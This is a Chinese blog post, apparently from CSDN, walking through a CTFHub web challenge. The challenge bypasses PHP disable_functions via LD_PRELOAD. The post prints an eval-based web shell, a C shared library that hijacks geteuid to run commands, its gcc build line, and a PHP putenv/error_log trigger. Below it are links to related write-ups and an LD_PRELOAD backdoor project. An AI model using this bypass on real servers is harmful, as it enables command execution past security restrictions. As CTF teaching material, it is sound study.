ctfhub-web进阶-[LD_PRELOAD]

最新推荐文章于 2024-08-29 00:18:18 发布
最新推荐文章于 2024-08-29 00:18:18 发布
阅读量1.5k 收藏 11
点赞数 4
分类专栏: # CTFHUB 文章标签: linux php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51652864/article/details/118853600
版权

ctfhub-web进阶-[LD_PRELOAD]
题目描述:

目标:获取服务器上 /flag 文件中的 flag。需要了解 Linux LD_PRELOAD 环境变量。

CTFHub Bypass disable_function —— LD_PRELOAD
本环境来源于AntSword-Labs

<!DOCTYPE html>
<html>
<head>
    <title>CTFHub Bypass disable_function —— LD_PRELOAD</title>
</head>
<body>
<h1>CTFHub Bypass disable_function —— LD_PRELOAD</h1>
<p>本环境来源于<a href="https://github.com/AntSwordProject/AntSword-Labs">AntSword-Labs</a></p>
</body>
</html>
<?php
@eval($_REQUEST['ant']);
show_source(__FILE__);
?>

经典的LD_PRELOAD,直接使用蚁剑连接
在这里插入图片描述
根目录下出现了flag,但无法读取,也存在有readflag这类执行文件,使用蚁剑的插件就可以绕了
在这里插入图片描述
点击开始,即可在网站目录下生成文件
在这里插入图片描述
蚁剑连接这个文件,密码用原来的密码就可以
在这里插入图片描述
随后进入虚拟终端来执行readflag,即可获得flag
在这里插入图片描述
上面这是用蚁剑插件的方式来绕过LD_PRELOAD,还有一种是手动上传文件来绕

尝试利用LD_PRELOAD来动态链接重写这个getuid函数
为什么要用getuid这个函数?

因为我们是要劫持某个某个函数,而被劫持的函数得由我们来自己实现一次,所以函数原型必须一致,这就好说了,为了减少工作量,减少复杂性,所以我们尽量选择那些没有参数的系统函数,getuid就是这样的一个函数

步骤:

创建一个.c文件

#include<stdlib.h>
#include <stdio.h>        
#include<string.h> 
 
void payload(){
	system("/readflag >/tmp/yy");
}   
 
int geteuid(){
if(getenv("LD_PRELOAD") == NULL)
{ 
return 0; 
}
unsetenv("LD_PRELOAD");
payload();
}

接着用gcc编译,生成.so文件

gcc -fPIC -shared yy.c -o yy.so

然后先蚁剑连接网站,将yy.so上传到/tmp目录下
在这里插入图片描述

接着可以使用mail()函数去利用这个LD_PRELOAD,但mail()函数是被禁了的
在这里插入图片描述
但是还可以利用error_log()函数

<?php
putenv("LD_PRELOAD=/tmp/yy.so");
error_log("",1,"","");
?>

将这串代码上传到网站目录下
在这里插入图片描述
随后访问yy.php,再回到/tmp目录下,可以看到已经生成了yy文件
在这里插入图片描述
点开即是flag

o3Ev
关注
专栏目录
CTFHubweb-LD_PRELOAD-WP
若谷的博客
01-30 515
LD_PRELOADLinux系统的一个环境变量,它可以影响程序的运行时的链接(Runtime linker),它允许你定义在程序运行前优先加载的动态链接库。通过这个环境变量,我们可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖正常的函数库。一方面,我们可以以此功能来使用自己的或是更好的函数(无需别人的源码),而另一方面,我们也可以以向别人的程序注入程序,从而达到特定的目的。这里面的某个函数需要在运行的时候能够启动子进程,这样才能重新加载我们所设置的环境变量,从而劫持子进程所调用的库函数。
CTFhub Bypass disable_function LD_PRELOAD
qq_41497476的博客
07-29 772
基本做完了基础题目,开始进入进阶的题了,第一道题给我整懵了。知识盲区 <!DOCTYPE html> <html> <head> <title>CTFHub Bypass disable_function —— LD_PRELOAD</title> </head> <body> <h1>CTFHub Bypass disable_function —— LD_PRELOAD</h1> <
CTFHub WP LD_PRELOAD
m0_62879498的博客
04-08 1369
CTFHub WP LD_PRELOAD 在做渗透测试中,有时候会遇到无法执行 shell命令的情况,有可能是php函数 disable_function禁用了危险函数,如dl exec system passthure等等(eval并非PHP函数,需要PHP扩展 Suhosin对其进行禁用) disable_function 是php.ini中的一个设置选项,用来禁用php中的某些函数,通常是危险函数。 如果了解过linux动态加载的话,我们就会明白还有一种无法执行 shell命令的情况,那就
CTFHub-Web进阶-PHP
最新发布
qq_68186313的博客
08-29 318
先上通过截图T^T。
CTFHUB-web进阶LD_PRELOAD
qq_30396927的博客
05-30 1188
CTFHUB-web进阶LD_PRLOAD 知识点: LD_PRELOADLinux系统的一个环境变量,用于动态库的加载,动态库加载的优先级最高,即加载动态库时先加载LD_PRLOAD,它可以影响程序的运行时的链接(Runtime linker)。LD_PRELOAD的功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量,我们可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖正常的函数库。 程序中我们经常要调用一些外部库的函数,以sendmail程序中的geteuid()为
ctfhub -- LD_PRELOAD
qq_44640313的博客
06-18 345
php中的disabled_functions主要是用于禁用一些危险的函数防止被一些攻击者利用。
CTFHub 技能树 LD_PRELOAD
weixin_44732566的博客
03-11 2317
CTFHub 技能树 LD_PRELOAD 百度一下LD_PRELOAD:允许你定义在程序运行前优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量,我们可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖正常的函数库。一方面,我们可以以此功能来使用自己的或是更好的函数(无需别人的源码),而另一方面,我们也可以以向别人的程序注入程序,从而达...
CTFHub Bypass disable_function 利用LD_PRELOAD绕过
z2560088的博客
10-04 903
LD_PRELOADLinux系统的一个环境变量,它可以影响程序的运行时的链接(Runtime linker),它允许你定义在程序运行前优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量,我们可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖正常的函数库。一方面,我们可以以此功能来使用自己的或是更好的函数(无需别人的源码),而另一方面,我们也可以以向别人的程序注入程序,从而达到特定的目的。 putenv()用来改变或增加环境变量的内容. 参数.
ELS-N04_hw_la_R2-C605_PRELOAD-10.1.0.1_ReleaseNotes
09-23
华为ELS-N04_hw_la_R2-C605_PRELOAD-10.1.0.1_ReleaseNotes解读 ELS-N04_hw_la_R2-C605_PRELOAD-10.1.0.1_ReleaseNotes是华为的一份软件发布笔记,介绍了ELS-N04_hw_la_R2-C605_PRELOAD 10.1.0.1版本的软件更新内容...
go-ldpreload-backdoor:使用Go进行LD_PRELOAD libc挂钩
02-05
使用Go LD_PRELOAD libc挂钩 这是在共享库中使用Go封装libc函数并启动TCP服务器(&ldquo;后门”)的实验,该服务器允许从客户端(如telnet或netcat)运行任意命令。 这是一款用于教育目的的玩具,可演示Go的某些功能。 ...
srv-shim:通过LD_PRELOAD getaddrinfoconnect挂钩对旧系统的SRV记录支持
05-15
LD_PRELOAD=target/debug/libsrvshim.so \ curl _my-service._tcp.domain 您还可以在/etc/ld.so.conf创建一个条目,以使它被加载到系统上的所有进程中。 OSX: DYLD_INSERT_LIBRARIES=/abs/path/to/libsrvshim....
everybody-root:LD_PRELOAD shim 使未知用户成为 root
06-25
每个人都根 这是一个很小的LD_PRELOAD垫片,如果找不到请求的用户,它会导致getpwnam()和getpwnam_r()返回 root 的信息。 设置 $ make $ LD_PRELOAD= ` pwd ` /everybody-root.so /path/to/exe 为什么? 我需要它,以便我可以说服sshd以 root 用户身份登录,同时将他们请求的登录名传递给 PAM。 我应该用这个吗? 不。 学分和执照 版权所有 (c) 2015 罗伯特·诺里斯。 麻省理工学院执照。 请参阅许可证。
CTFHub LD_PRELOAD“wp(详解)
m0_73195494的博客
03-01 1399
打开界面发现如图所示的代码,显然可以通过蚁剑进行连接,连接成功在目录下找到flag文件,但flag打开为空,于是打开终端,发现对于发出的命令均返回ret=127,说明是disable_functions(禁用函数)生效,查看phpinfo,发现禁用了许多函数。
Linux RE----LD_PRELOAD
qq_42192672的博客
10-03 596
最近在学习CTF Wiki,记录一下,用来以后给自己看方便 给个链接:https://ctf-wiki.github.io/ctf-wiki/reverse/linux/ld_preload/ 其实虽然直接接触过64位的一些逆向,但是完全基于Linux的只是来逆向破解还真的没有,一步步来吧 原理(摘自原文) 正常情况下, Linux 动态加载器ld-linux(见man手册ld-linux...
Bypass disable_function —— LD_PRELOAD
qq_42851946的博客
05-21 1635
Bypass disable_function —— LD_PRELOAD CTFHub-web技能树中的一道题 做这道题之前,先要稍微了解下: LD_PRELOAD: 是Linux系统的一个环境变量,它指定的*.so文件会在程序本身的*.so文件之前被加载。 putenv(): PHP函数,可以设置环境变量 mail(),error_log() PHP函数,在运行时会执行系统中的程序:sendmail 题目描述 已经拿到了shell,但是PHP配置中的disable_functions禁用了大部分常规的的
从一道ctf题学习LD_PRELOAD绕过函数禁用
m0_62422842的博客
09-13 1665
前两天做了一道ctf题目,遇到比较陌生的知识点,利用LD_PRELOAD环境变量,调用新的进程来加载恶意的so文件,执行我们注入程序中的恶意代码,从而绕过函数限制。当然,这么说也比较抽象,后文会详细说明。
从一道题学习LD_PRELOAD & putenv()
cosmoslin的博客
10-09 715
[极客大挑战 2019]RCE ME 题目分析 <?php error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long.");
无字母数字RCE与LD_PRELOAD绕disable_functions
D.MIND 的博客
04-19 1289
<?php error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long."); }
CTFHub技能树 Web进阶详解
weixin_45808483的博客
12-02 2330
PHP Bypass disable_function PHP 的 disabled_functions主要是用于禁用一些危险的函数防止被一些攻击者利用 有四种绕过 disable_functions 的手法: 攻击后端组件,寻找存在命令注入的 web 应用常用的后端组件,如,ImageMagick 的魔图漏洞、bash 的破壳漏洞等等 寻找未禁用的漏网函数,常见的执行命令的函数有 system()、exec()、shell_exec()、passthru(),偏僻的popen()、proc_open
LD_PRELOAD=/lib/aarch64-linux-gnu/libgcc_s.so.1 vncserver -localhost no 解析
10-07
LD_PRELOAD=/lib/aarch64-linux-gnu/libgcc_s.so.1 vncserver -localhost no 是一个命令行的语法,用于启动 VNC 服务器,并禁止仅本地访问。这个命令中的 LD_PRELOAD 是一个环境变量,它用于在程序加载之前,预先...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

o3Ev

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值